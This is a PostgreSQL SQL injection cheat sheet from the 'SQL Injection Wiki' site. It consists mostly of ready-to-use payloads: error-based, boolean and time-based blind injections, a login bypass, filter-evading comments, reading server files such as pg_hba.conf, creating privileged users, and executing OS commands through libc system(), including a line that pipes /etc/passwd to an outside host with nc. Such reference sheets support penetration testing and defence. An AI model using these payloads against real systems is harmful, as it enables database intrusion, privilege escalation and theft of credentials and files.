The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

PostgreSQL SQL Injection Cheat Sheet

 

 

Back to top

Version   SELECT version() 
Current User  SELECT user;
 SELECT current_user;
 SELECT session_user;
 SELECT usename FROM pg_user;
 SELECT getpgusername();
Current Database  SELECT current_database()

Back to top

Error Based SQLi  For integer inputs : cast((chr(95)||current_database()) as numeric)
 For string inputs   : '||cast((chr(95)||current_database()) as numeric)||'

 The attacks above should throw conversion errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.

 product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10

Back to top

Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached.

  • ProductID = 1;SELECT pg_sleep(25)--
  • ProductID = 1);SELECT pg_sleep(25)--
  • ProductID = 1';SELECT pg_sleep(25)--
  • ProductID = 1');SELECT pg_sleep(25)--
  • ProductID = 1));SELECT pg_sleep(25)--
  • ProductID = 1'));SELECT pg_sleep(25)--
  • ProductID = SELECT pg_sleep(25)--

Back to top

SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'

Back to top

DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable

Back to top

Anonymous If is not allowed. (CASE statement can avaliable)

SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; -- returns A

Back to top

SELECT (CHAR(75)||CHAR(76)||CHAR(77))

This will return ‘KLM’.

Back to top

To read data from local files, first you should create a temporary file for that. Read file contents into this table, then read the data from table.

CREATE TABLE temptable(t text);
COPY temptable FROM 'c:/boot.ini';
SELECT * FROM temptable  LIMIT 1 OFFSET 0

This functionality needs permissions for the service user who has been running database service. On default, it is not possible to read local files on Windows systems because postgres user doesn’t have read permissions.

Do not forget to drop the temporary file after exploitation.

DROP TABLE temptable;

Back to top

SELECT pg_read_file('global/pg_hba.conf',0,10000000);

But that function can read only the contents of the DATA directory.

Back to top

SELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6', ‘system’ LANGUAGE ‘C’ STRICT; -- priv

Back to top

CREATE USER test1 PASSWORD ‘pass1'; -- priv
CREATE USER test1 PASSWORD ‘pass1' CREATEUSER; -- priv, grant some privs at the same time

Back to top

DROP USER test1; -- priv

Back to top

ALTER USER test1 CREATEUSER CREATEDB; -- priv

Back to top

You should add “host” record to the pg_hba.conf file located in the DATA directory.

host     all     all     192.168.20.0/24     md5

Back to top

SELECT pg_read_file('global/pg_auth',0,10000000);

Back to top

SELECT pg_read_file('global/pg_auth',0,10000000);

Back to top

SELECT pg_read_file('global/pg_database',0,10000000)

Back to top

template0
template1

Back to top

SELECT current_setting('data_directory') --priv,
returns: C:/Program Files/PostgreSQL/8.3/data

SELECT current_setting('hba_file') --priv,
returns: C:/Program Files/PostgreSQL/8.3/data/pg_hba.conf

Back to top

?vulnerableParam=-1; SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({INJECTION}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+

{INJECTION} = You want to run the query.

If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.